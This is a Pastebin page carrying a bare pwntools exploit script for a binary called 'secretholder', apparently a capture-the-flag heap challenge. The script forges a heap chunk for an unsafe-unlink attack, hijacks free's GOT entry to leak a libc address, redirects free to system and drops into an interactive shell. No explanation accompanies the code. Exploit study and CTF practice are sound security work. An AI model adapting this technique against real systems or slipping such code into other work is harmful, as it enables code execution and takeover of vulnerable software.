daily pastebin goal
86%
SHARE
TWEET

Untitled

a guest Jan 12th, 2018 52 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. from pwn import *
  2.  
  3. def keep(idx, data):
  4.     p.recvuntil('3. Renew secret')
  5.     p.sendline('1')
  6.     p.recvuntil('3. Huge secret')
  7.     p.sendline(str(idx))
  8.     p.recvline()
  9.     p.sendline(data)
  10.  
  11. def wipe(idx):
  12.     p.recvuntil('3. Renew secret')
  13.     p.sendline('2')
  14.     p.recvuntil('3. Huge secret')
  15.     p.sendline(str(idx))
  16.  
  17. def renew(idx, data):
  18.     p.recvuntil('3. Renew secret')
  19.     p.sendline('3')
  20.     p.recvuntil('3. Huge secret')
  21.     p.sendline(str(idx))
  22.     p.recvline()
  23.     p.send(data)
  24.  
  25. if __name__ == '__main__':
  26.     p = process("./secretholder")
  27.     context.log_level='debug'
  28.     addr = 0x6020a8
  29.     free_got = 0x602018
  30.     puts_plt = 0x4006c0
  31.  
  32.     keep(1,'AAAA')
  33.     keep(2,'AAAA')
  34.     keep(3,'AAAA')
  35.  
  36.     wipe(1)
  37.     wipe(2)
  38.     wipe(3)
  39.  
  40.     keep(3,'AAAA')
  41.  
  42.     wipe(1)
  43.  
  44.     keep(1,'AAAA')
  45.     keep(2,'AAAA')
  46.  
  47.     fake_chunk = p64(0) + p64(0x21) + p64(addr - 0x18) + p64(addr - 0x10)
  48.  
  49.     junk = p64(0x20) + p64(0x90) + "A"*128 + p64(0x90) + p64(0x91) + "A"*128 + p64(0x90) + p64(0x91)
  50.  
  51.     renew(3,fake_chunk + junk)
  52.     sleep(0.2)
  53.     wipe(2)
  54.  
  55.     renew(3, p64(0)*3 + p64(free_got - 0x10))
  56.  
  57.     renew(3, p64(0)*2 + p64(puts_plt))
  58.  
  59.     renew(1,'/bin/sh;' + "A"*8)
  60.  
  61.     wipe(1)
  62.    
  63.     p.recvuntil("/bin/sh;" + "A"*8)
  64.     leak = u64(p.recv(6)[0:].ljust(8,'\x00'))
  65.     print "[+] Leak : 0x%x" % leak
  66.     system = leak - 0x3be7b8 + 0x45390 - 0x63c0
  67.  
  68.     renew(3, p64(0)*2 + p64(system))
  69.    
  70.     wipe(1)
  71.    
  72.     p.interactive()
RAW Paste Data
Top